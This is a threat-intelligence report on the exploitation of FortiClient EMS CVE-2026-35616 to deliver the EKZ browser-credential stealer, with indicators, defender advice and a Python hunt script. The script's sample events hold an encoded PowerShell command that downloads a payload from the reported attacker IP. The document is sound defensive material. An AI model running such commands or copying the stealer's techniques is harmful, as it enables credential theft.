FortiClient EMS CVE-2026-35616 EKZ Infostealer campaign

Summary

Arctic Wolf reports May 2026 intrusions where an unattributed threat cluster exploited CVE-2026-35616 in FortiClient Endpoint Management Server (EMS) to push a fake Fortinet endpoint patch to managed devices. The payload, named EKZ Infostealer by Arctic Wolf, harvests browser credentials, cookies, and autofill data from Chromium- and Gecko-family browsers.

The durable tradecraft is management-plane weaponization: once attackers bypass FortiClient EMS API authentication, they can modify EMS-managed configuration and use trusted endpoint-management workflows to execute PowerShell on many managed endpoints without separately compromising each host.

Why this matters

  • FortiClient EMS is a centralized endpoint-management path. A single exposed vulnerable EMS server can become a distribution mechanism for malware across the endpoints it manages.
  • The malware is disguised as a Fortinet patch (FortiEndpoint_Patch.exe), making the activity blend with legitimate endpoint-update expectations.
  • EKZ Infostealer targets high-value browser artifacts, including credentials, cookies, and autofill data. Stolen session cookies and saved passwords can outlive cleanup of the initial EMS compromise.
  • The chain launches its commands through FortiClient-managed VPN / remote-access scripting and signed FortiClient components, so application allowlists and parent-process baselines that trust FortiClient may miss it.
  • Fortinet confirmed exploitation in the wild for CVE-2026-35616 and advised affected FortiClient EMS 7.4.5 / 7.4.6 customers to apply hotfixes or upgrade to 7.4.7 or later.

Reported tradecraft

  1. Attackers exploit CVE-2026-35616, an improper-access-control flaw that lets unauthenticated requests reach privileged FortiClient EMS API actions.
  2. The actor modifies EMS configuration, including deferring firmware-upgrade reminders and changing Remote Access Profile / endpoint policy configuration.
  3. The modified policy inserts a malicious script that runs on managed endpoints through FortiClient's normal management pathway.
  4. FortiClient's legitimate fortitray.exe launches cmd.exe, which executes a .cmd file containing Base64-encoded PowerShell.
  5. The PowerShell downloads p.exe / FortiEndpoint_Patch.exe from 83.138.53[.]110, runs the credential stealer, periodically posts harvested results back to the same infrastructure, then removes local artifacts.
  6. EKZ Infostealer stages browser data into log.txt under ProgramData; the stealer itself lacks direct network exfiltration, so the surrounding PowerShell handles outbound delivery.
  7. For Chromium-family browsers, EKZ copies itself into the browser Application\ directory and relaunches from there to satisfy Chromium Elevation Service path validation before calling IElevator::DecryptData against os_crypt.app_bound_encrypted_key material.
  8. The tool iterates browser profiles and decrypts SQLite databases for credentials, cookies, and autofill data; Arctic Wolf notes CLI verbs such as action_list, view, label, and export, suggesting repeated operator-driven use across hosts.

Notable indicators and pivots

  • Vulnerability: CVE-2026-35616; Fortinet PSIRT FG-IR-26-099.
  • Affected FortiClient EMS line: 7.4.5 through 7.4.6; FortiClient EMS 7.2 not affected per Fortinet.
  • Fake patch / stealer names: FortiEndpoint_Patch.exe, remote p.exe.
  • Infrastructure observed by Arctic Wolf: 83.138.53[.]110/dl/p.exe and HTTP POST exfiltration to 83.138.53[.]110.
  • Main payload SHA-256: 0da123adf9251957a4b850a3f6bd6a753dd4892be176a84a18450e899534cc5e.
  • Additional files hosted on the same server included FortiEndpoint_Patch.2.4.9.zip, FortiEndpoint_Patch.2.4.9.msi, fil_api_ms_win_crt_apibase_l1_1_0.dll, and Microsoft® Windows® Operating System-Installer.exe.
  • Local artifact pattern: ProgramData\log.txt containing staged credential output before PowerShell exfiltration.
  • Process lineage to review: fortitray.exe → cmd.exe → PowerShell → fake Fortinet patch executable.

Defender heuristics

  • Patch or hotfix FortiClient EMS 7.4.5 / 7.4.6 immediately; upgrade to FortiClient EMS 7.4.7 or later where possible.
  • Treat any vulnerable internet-exposed EMS server as potentially compromised until logs, configuration history, and managed-endpoint telemetry are reviewed.
  • Audit FortiClient EMS Remote Access Profile and endpoint policy changes around the exposure window, especially scripts, VPN tunnel scripts, firmware-reminder settings, and unexpected PowerShell command material.
  • Hunt managed endpoints for fortitray.exe spawning cmd.exe or PowerShell, downloads from raw IP infrastructure, FortiEndpoint_Patch.exe, p.exe, or ProgramData\log.txt creation.
  • Search proxy, EDR, and firewall telemetry for 83.138.53[.]110; preserve packet metadata and HTTP POST timing if present.
  • After confirmed execution, rotate browser-saved credentials, invalidate web sessions, review MFA prompts and impossible-travel events, and reset secrets used from affected endpoints.
  • Preserve EMS server logs, endpoint policy exports, PowerShell script-block logs, process trees, downloaded binaries, browser profile artifacts, and FortiClient logs before removing malware or reimaging.
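As an added hunt example covering the lineage in the Reported tradecraft steps and the endpoint heuristics above (this is not Arctic Wolf's, Fortinet's, or the IOC repository's code): the script below scores Sysmon-style process-create, file-create and proxy records against the page's indicators, decoding any PowerShell -EncodedCommand argument (Base64 over UTF-16LE) before matching so the raw-IP download and C2 address hidden inside the .cmd file are visible. The event field names, the browser list, the encoded command and the sample events are constructed assumptions; only the IP, filenames and hash come from the page.

```python
"""Added hunt example for the FortiClient EMS / EKZ chain described on this
page. It is not Arctic Wolf's, Fortinet's, or the attacker's code. The event
layouts (Sysmon-style process-create, file-create and a proxy record) and the
sample events are constructed assumptions; only the IP, filenames and hash
come from the page."""
import base64
import re
from typing import Dict, List, Optional

C2_IP = "83.138.53.110"                      # page reports 83.138.53[.]110
PAYLOAD_NAMES = {"fortiendpoint_patch.exe", "p.exe"}
PAYLOAD_SHA256 = "0da123adf9251957a4b850a3f6bd6a753dd4892be176a84a18450e899534cc5e"
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

RAW_IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?:[/:]|$)", re.I)
ENC_CMD = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
PAYLOAD_REF = re.compile(r"(?<![a-z0-9_])(fortiendpoint_patch\.exe|p\.exe)", re.I)
LOG_TXT = re.compile(r"\\programdata\\log\.txt$", re.I)
# EKZ copies itself under the browser's Application\ folder (step 7 above);
# the browser list here is an assumption, extend it for your fleet.
BROWSER_APP_EXE = re.compile(r"\\(chrome|edge|brave|chromium)\\application\\[^\\]+\.exe$", re.I)


def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a PowerShell -EncodedCommand argument (Base64
    over UTF-16LE), or None when the command line carries none."""
    m = ENC_CMD.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev: dict) -> List[str]:
    """Map one telemetry event to the page heuristics it matches."""
    hits: List[str] = []
    kind = ev.get("type")
    image = basename(ev.get("image", ""))
    if kind == "process":
        parent = basename(ev.get("parent_image", ""))
        cmd = ev.get("command_line", "")
        if parent == "fortitray.exe" and image in SHELLS:
            hits.append("fortitray.exe spawned a shell")
        if image in PAYLOAD_NAMES or ev.get("sha256", "").lower() == PAYLOAD_SHA256:
            hits.append("known fake Fortinet patch binary")
        decoded = decode_encoded_command(cmd)
        # Match against the decoded script too, not only the opaque Base64.
        text = cmd if decoded is None else cmd + "\n" + decoded
        if decoded is not None:
            hits.append("base64-encoded PowerShell")
        if RAW_IP_URL.search(text):
            hits.append("download from raw-IP URL")
        if C2_IP in text:
            hits.append("reported C2 address in command line")
        if PAYLOAD_REF.search(text):
            hits.append("fake patch filename referenced")
    elif kind == "file":
        target = ev.get("target", "")
        if LOG_TXT.search(target):
            hits.append("credential staging file ProgramData\\log.txt")
        if BROWSER_APP_EXE.search(target) and image not in {"setup.exe", "msiexec.exe"}:
            hits.append("executable dropped into browser Application directory")
    elif kind == "network":
        if ev.get("dest_ip") == C2_IP:
            suffix = " (HTTP POST, likely exfil)" if ev.get("method") == "POST" else ""
            hits.append("traffic to reported C2" + suffix)
    return hits


def triage(events) -> Dict[int, List[str]]:
    """Return {event id: hits} for every event that matched at least once."""
    return {ev["id"]: h for ev in events if (h := score_event(ev))}


# Constructed sample telemetry modelled on the reported lineage (not real logs).
_ENCODED = base64.b64encode(
    "IWR http://83.138.53.110/dl/p.exe -OutFile C:\\ProgramData\\FortiEndpoint_Patch.exe"
    .encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"id": 1, "type": "process",
     "parent_image": r"C:\Program Files\Fortinet\FortiClient\FortiTray.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd.exe /c C:\ProgramData\vpn.cmd"},
    {"id": 2, "type": "process", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoP -W Hidden -EncodedCommand " + _ENCODED},
    {"id": 3, "type": "process",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\ProgramData\FortiEndpoint_Patch.exe", "sha256": PAYLOAD_SHA256,
     "command_line": "FortiEndpoint_Patch.exe export"},
    {"id": 4, "type": "file", "image": r"C:\ProgramData\FortiEndpoint_Patch.exe",
     "target": r"C:\ProgramData\log.txt"},
    {"id": 5, "type": "file", "image": r"C:\ProgramData\FortiEndpoint_Patch.exe",
     "target": r"C:\Program Files\Google\Chrome\Application\FortiEndpoint_Patch.exe"},
    {"id": 6, "type": "network", "method": "POST", "dest_ip": "83.138.53.110",
     "url": "http://83.138.53.110/"},
    {"id": 7, "type": "process", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for ev_id, hits in triage(SAMPLE_EVENTS).items():
        print(ev_id, hits)
```

Feed it exported EDR or Sysmon events in the same shape and treat any host with the fortitray.exe → shell hit plus a raw-IP download or a ProgramData\log.txt write as a confirmed-execution candidate for the credential-rotation steps above. Decoding the encoded command is the part that matters: the on-disk .cmd file and the process command line show only Base64, and the C2 address appears nowhere else on the endpoint until the download happens.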

Attribution notes

Arctic Wolf describes the activity as a threat cluster and does not name a specific actor. Track this as an unattributed FortiClient EMS exploitation and endpoint-management abuse campaign unless future primary reporting links EKZ Infostealer or the infrastructure to a stable actor.

Sources

  • Arctic Wolf Labs: https://arcticwolf.com/resources/blog/forticlient-ems-exploited-via-cve-2026-35616-to-deliver-ekz-infostealer-disguised-as-a-fortinet-patch/
  • Arctic Wolf Labs IOC repository: https://github.com/rtkwlf/wolf-tools/tree/main/threat-intelligence/unattributed-fake-forticlient-update-cve-2026-35616
  • Fortinet PSIRT FG-IR-26-099: https://fortiguard.fortinet.com/psirt/FG-IR-26-099
  • The Hacker News summary: https://thehackernews.com/2026/05/threat-actors-exploit-critical.html